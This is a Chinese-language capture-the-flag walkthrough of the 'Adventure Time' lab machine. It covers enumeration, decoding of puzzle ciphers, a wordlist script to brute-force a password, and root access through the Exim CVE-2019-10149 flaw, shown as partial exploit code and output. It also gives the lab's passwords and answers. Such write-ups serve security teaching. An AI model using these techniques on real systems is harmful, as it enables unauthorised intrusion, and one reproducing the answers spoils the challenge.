Adventure Time
端口扫描
root@ip-10-10-13-98:~/adventuretime# nmap -sTCV -p- --min-rate 1000 10.10.195.197
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-26 09:39 GMT
Nmap scan report for ip-10-10-195-197.eu-west-1.compute.internal (10.10.195.197)
Host is up (0.0024s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 1401357 Sep 21 2019 1.jpg
| -r--r--r-- 1 ftp ftp 233977 Sep 21 2019 2.jpg
| -r--r--r-- 1 ftp ftp 524615 Sep 21 2019 3.jpg
| -r--r--r-- 1 ftp ftp 771076 Sep 21 2019 4.jpg
| -r--r--r-- 1 ftp ftp 1644395 Sep 21 2019 5.jpg
|_-r--r--r-- 1 ftp ftp 40355 Sep 21 2019 6.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.13.98
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:d2:86:99:c2:62:2d:95:d0:75:9c:4e:83:b6:1b:ca (RSA)
| 256 db:87:9e:06:43:c7:6e:00:7b:c3:bc:a1:97:dd:5e:83 (ECDSA)
|_ 256 6b:40:84:e6:9c:bc:1c:a8:de:b2:a1:8b:a3:6a:ef:f0 (EdDSA)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: You found Finn
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
| Not valid before: 2019-09-20T08:29:36
|_Not valid after: 2020-09-19T08:29:36
|_ssl-date: TLS randomness does not represent time
31337/tcp open Elite?
| fingerprint-strings:
| DNSStatusRequest, RPCCheck, SSLSessionReq:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not
| DNSVersionBindReq:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not
| version
| bind
| GenericLines, NULL:
| Hello Princess Bubblegum. What is the magic word?
| GetRequest:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not GET / HTTP/1.0
| HTTPOptions:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not OPTIONS / HTTP/1.0
| Help:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not HELP
| RTSPRequest:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not OPTIONS / RTSP/1.0
| SIPOptions:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
21 - FTP
从扫描结果中可以看到存在一些图片, 我尝试文件隐写但是无果, 同时不可以上传文件
80/443
进行目录扫描查看是否有什么隐藏的文件
root@ip-10-10-13-98:~/adventuretime# gobuster dir -u https://10.10.195.197 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip,bak -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.195.197
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html,zip,bak
[+] Timeout: 10s
===============================================================
2023/11/26 09:58:04 Starting gobuster
===============================================================
/index.html (Status: 200)
/candybar (Status: 301)
访问新发现的 /candybar 目录, 其中有一张图片告诉我们一些信息, 一段加密内容之后我开始了解密发现一些内容
root@ip-10-10-13-98:~/adventuretime# echo KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4=== | base32 -d
Palpnh rwtrz iwt HHA rtgixuxrpit udg rajth.
我发现解密出来时乱文, 所以需要进行一些转换将其变为正常的内容 : quipqiup, 解密出来内容为
Albans check the SSL certificate for clues.
提示告诉我们检查 SSL 证书, 估计是存在域的问题, 查看 SSL 证书发现两个子域 : adventure-time.com 、land-of-ooo.com 之后开始进行枚举
root@ip-10-10-13-98:~/adventuretime# gobuster dir -u https://land-of-ooo.com/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip,bak -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://land-of-ooo.com/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,zip,bak,php,txt
[+] Timeout: 10s
===============================================================
2023/11/26 10:16:38 Starting gobuster
===============================================================
/index.html (Status: 200)
/yellowdog (Status: 301)
访问新发现的目录 yellowdog 查看其内容
之后再次进行枚举, 接着我��发现了新的目录
root@ip-10-10-13-98:~/adventuretime# gobuster dir -u https://land-of-ooo.com/yellowdog/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://land-of-ooo.com/yellowdog/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2023/11/26 11:32:39 Starting gobuster
===============================================================
/bananastock (Status: 301)
===============================================================
2023/11/26 11:33:11 Finished
===============================================================
我们可以发现一段新的加密内容, 之后再次进行解密
再次可以得到一个内容 THEBANANASARETHEBEST!!! 这可能是一个密码, 之后再次进行扫描发现一个新的内容
root@ip-10-10-13-98:~/adventuretime# gobuster dir -u https://land-of-ooo.com/yellowdog/bananastock/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://land-of-ooo.com/yellowdog/bananastock/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2023/11/26 11:48:59 Starting gobuster
===============================================================
/princess (Status: 301)
===============================================================
2023/11/26 11:49:32 Finished
===============================================================
从图片得到的消息来看, 我们可以知道有一个用户, 之后查看网页源代码发现一段加密信息
进行解密, 之后得到一些内容
31337
我们连接 31337 端口, 我们可以发现其需要我们提供一个密码, 我们可以将我们得到的内容来进行查看
root@ip-10-10-13-98:~/adventuretime# telnet 10.10.195.197 31337
Trying 10.10.195.197...
Connected to 10.10.195.197.
Escape character is '^]'.
Hello Princess Bubblegum. What is the magic word?
ricardio
The new username is: apple-guards
之后我们就可以得到一个用户的名称, 可以结合我们之前的密码进行连接
后渗透
apple-guards
对应的上面发现的密码 THEBANANASARETHEBEST!!! , 需要进行一些修改才可以完成登录的操作 THE BANANAS ARE THE BEST!!!
root@ip-10-10-13-98:~/adventuretime# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
1 package can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
No mail.
Last login: Sun Nov 26 12:14:08 2023 from 10.10.13.98
apple-guards@at:~$ id
uid=1009(apple-guards) gid=1009(apple-guards) groups=1009(apple-guards)
apple-guards@at:~$
apple-guards —> marceline
接着在 apple-guards 家目录发现一个 mbox 文件, 我发现其告诉我们存在一个属于 marceline 的文件可以帮助我们
apple-guards@at:~$ cat mbox
From marceline@at Fri Sep 20 16:39:54 2019
Return-Path: <marceline@at>
X-Original-To: apple-guards@at
Delivered-To: apple-guards@at
Received: by at.localdomain (Postfix, from userid 1004)
id 6737B24261C; Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
Subject: Need help???
To: <apple-guards@at>
X-Mailer: mail (GNU Mailutils 3.4)
Message-Id: <20190920143954[email protected]>
Date: Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
From: marceline@at
Hi there bananaheads!!!
I heard Princess B revoked your access to the system. Bummer!
But I'll help you guys out.....doesn't cost you a thing.....well almost nothing.
I hid a file for you guys. If you get the answer right, you'll get better access.
Good luck!!!!
之后进行枚举发现了这个文件, 之后运行这个文件, 其告诉我们需要提供一个密码
apple-guards@at:~$ find / -user marceline 2>/dev/null
/etc/fonts/helper
根据其提示我破解出了密码得到对应的密钥: vigenere-cipher
随后使用得到的密钥, 我们可以得到如下内容
======================================
BananaHead Access Pass
created by Marceline
======================================
Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha
Ready for the question?
The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse
Did you solve the puzzle? yes
What is the word I'm looking for? Abadeer
That's it!!!! You solved my puzzle
Don't tell princess B I helped you guys!!!
My password is 'My friend Finn'
apple-guards@at:~$ su marceline
Password:
marceline@at:/home/apple-guards$ id
uid=1004(marceline) gid=1004(marceline) groups=1004(marceline)
marceline —> peppermint-butler
之后我们在 marceline 发现一个特殊的文件, 从中可以得到一个加密内容
marceline@at:~$ cat I-got-a-secret.txt
Hello Finn,
I heard that you pulled a fast one over the banana guards.
B was very upset hahahahaha.
I also heard you guys are looking for BMO's resetcode.
You guys broke him again with those silly games?
You know I like you Finn, but I don't want to anger B too much.
So I will help you a little bit...
But you have to solve my little puzzle. Think you're up for it?
Hahahahaha....I know you are.
111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010
之后我们再次进行解密 : spoon-language , 之后我们再次的得到一个新的密钥
我将其再次使用于之前的 31337 端口, 再次得到一个密码
root@ip-10-10-13-98:~/adventuretime# telnet 10.10.195.197 31337
Trying 10.10.195.197...
Connected to 10.10.195.197.
Escape character is '^]'.
Hello Princess Bubblegum. What is the magic word?
ApplePie
The password of peppermint-butler is: That Black Magic
之后使用得到的账号再次进行登录
marceline@at:~$ su peppermint-butler
Password:
peppermint-butler@at:/home/marceline$ id
uid=1006(peppermint-butler) gid=1006(peppermint-butler) groups=1006(peppermint-butler)
peppermint-butler —> gunter
在 peppermint-butler 家目录我发现一个照片估计存在文件隐写术, 将其下载到本地进行查看
peppermint-butler@at:~$ ls -al butler-1.jpg
-rw------- 1 peppermint-butler peppermint-butler 85555 sep 21 2019 butler-1.jpg
很可惜存在密码, 之后我前往了靶机查看属于用户 peppermint-butler 的文件
root@ip-10-10-13-98:~/adventuretime# steghide info butler-1.jpg
"butler-1.jpg":
format: jpeg
capacity: 3.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
root@ip-10-10-13-98:~/adventuretime#
接着我发现了两个文件, 同时查看发现了两个 ZIP 文件, 对应的估计是照片隐藏 ZIP 文件
peppermint-butler@at:~$ find / -user peppermint-butler 2>/dev/null | grep -v -E "proc|home"
/usr/share/xml/steg.txt
/etc/php/zip.txt
peppermint-butler@at:~$ cat /usr/share/xml/steg.txt
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.
So I need to keep this safe.
The password of my secret file is 'ToKeepASecretSafe'
peppermint-butler@at:~$ cat /etc/php/zip.txt
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.
So I need to keep this safe.
The password of my secret file is 'ThisIsReallySave'
peppermint-butler@at:~$
进行解密
root@ip-10-10-13-98:~/adventuretime# steghide extract -sf butler-1.jpg
Enter passphrase:
wrote extracted data to "secrets.zip".
root@ip-10-10-13-98:~/adventuretime# unzip secrets.zip
Archive: secrets.zip
[secrets.zip] secrets.txt password:
extracting: secrets.txt
root@ip-10-10-13-98:~/adventuretime# cat secrets.txt
[0200 hours][upper stairs]
I was looking for my arch nemesis Peace Master,
but instead I saw that cowering little puppet from the Ice King.....gunter.
What was he up to, I don't know.
But I saw him sneaking in the secret lab of Princess Bubblegum.
To be able to see what he was doing I used my spell 'the evil eye' and saw him.
He was hacking the secret laptop with something small like a duck of rubber.
I had to look closely, but I think I saw him type in something.
It was unclear, but it was something like 'The Ice King s????'.
The last 4 letters where a blur.
Should I tell princess Bubblegum or see how this all plays out?
I don't know.......
root@ip-10-10-13-98:~/adventuretime#
从得到的内容可以知道用户 gunter 的一个密码的模式, 我们可以借此来创建密码标来进行爆破, 如何直接使用暴力模式生成的密码太多, 但是我们可以使用一些讨巧的方式, 从单词来看每个单词都是正确的单词所以可以从5 letter words starting with S 来进行获取产生密码单词
word_file = "/usr/share/dict/american-english"
target_length = 5
target_letter = "s"
f = open("./pass.txt", 'w', encoding='utf-8')
with open(word_file, "r") as file:
words = [word.strip() for word in file if word.strip().startswith(target_letter) and len(word.strip()) == target_length]
password = 'The Ice King '
for item in words:
f.write(password + item + "\n")
f.flush()
f.close()
peppermint-butler@at:~$ su gunter
Password:
gunter@at:/home/peppermint-butler$ id
uid=1007(gunter) gid=1007(gunter) groups=1007(gunter),1012(gcc)
gunter@at:/home/peppermint-butler$
gunter —> root
当我们继续进行枚举时我发现一个特殊的 SUID 程序 exim, 同时知晓了其对应的版本经过谷歌我发现了利用的脚本 CVE-2019-10149-privilege-escalation
gunter@at:/home/peppermint-butler$ find / -user root -perm -4000 -print 2>/dev/null | xargs ls -al
-rwsr-xr-x 1 root 1011 1140200 feb 14 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 378600 jun 12 2018 /usr/sbin/pppd
gunter@at:/home/peppermint-butler$ /usr/sbin/exim4 --version
Exim version 4.90_1 #4 built 14-Feb-2018 16:01:14
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
gunter@at:/home/peppermint-butler$
我们需要查看一下 exim 的配置修改一下 EXP 中端口信息
gunter@at:/etc/exim4$ cat update-exim4.conf.conf
# /etc/exim4/update-exim4.conf.conf
#
# Edit this file and /etc/mailname by hand and execute update-exim4.conf
# yourself or use 'dpkg-reconfigure exim4-config'
#
# Please note that this is _not_ a dpkg-conffile and that automatic changes
# to this file might happen. The code handling this will honor your local
# changes, so this is usually fine, but will break local schemes that mess
# around with multiple versions of the file.
#
# update-exim4.conf uses this file to determine variable values to generate
# exim configuration macros for the configuration file.
#
# Most settings found in here do have corresponding questions in the
# Debconf configuration, but not all of them.
#
# This is a Debian specific file
dc_eximconfig_configtype='local'
dc_other_hostnames='at'
dc_local_interfaces='127.0.0.1.60000'
dc_readhost=''
dc_relay_domains=''
dc_minimaldns='false'
dc_relay_nets=''
dc_smarthost=''
CFILEMODE='644'
dc_use_split_config='false'
dc_hide_mailname=''
dc_mailname_in_oh='true'
dc_localdelivery='mail_spool'
gunter@at:/tmp$ cat wizard.py | head -n 8
import socket
import os
server = "localhost"
port = 60000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
reply = s.recv(1024)
gunter@at:/tmp$ python3 wizard.py
220 at ESMTP Exim 4.90_1 Ubuntu Sun, 26 Nov 2023 16:10:39 +0100
250 at Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
b'250 OK id=1r7GmN-0004V0-7Z\r\n'
sh: 1: /tmp/s: not found
gunter@at:/tmp$ ls -al /tmp/s
---s--x--x 1 root Debian-exim 8496 nov 26 16:10 s
gunter@at:/tmp$ ./s
root@at:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1007(gunter),1012(gcc)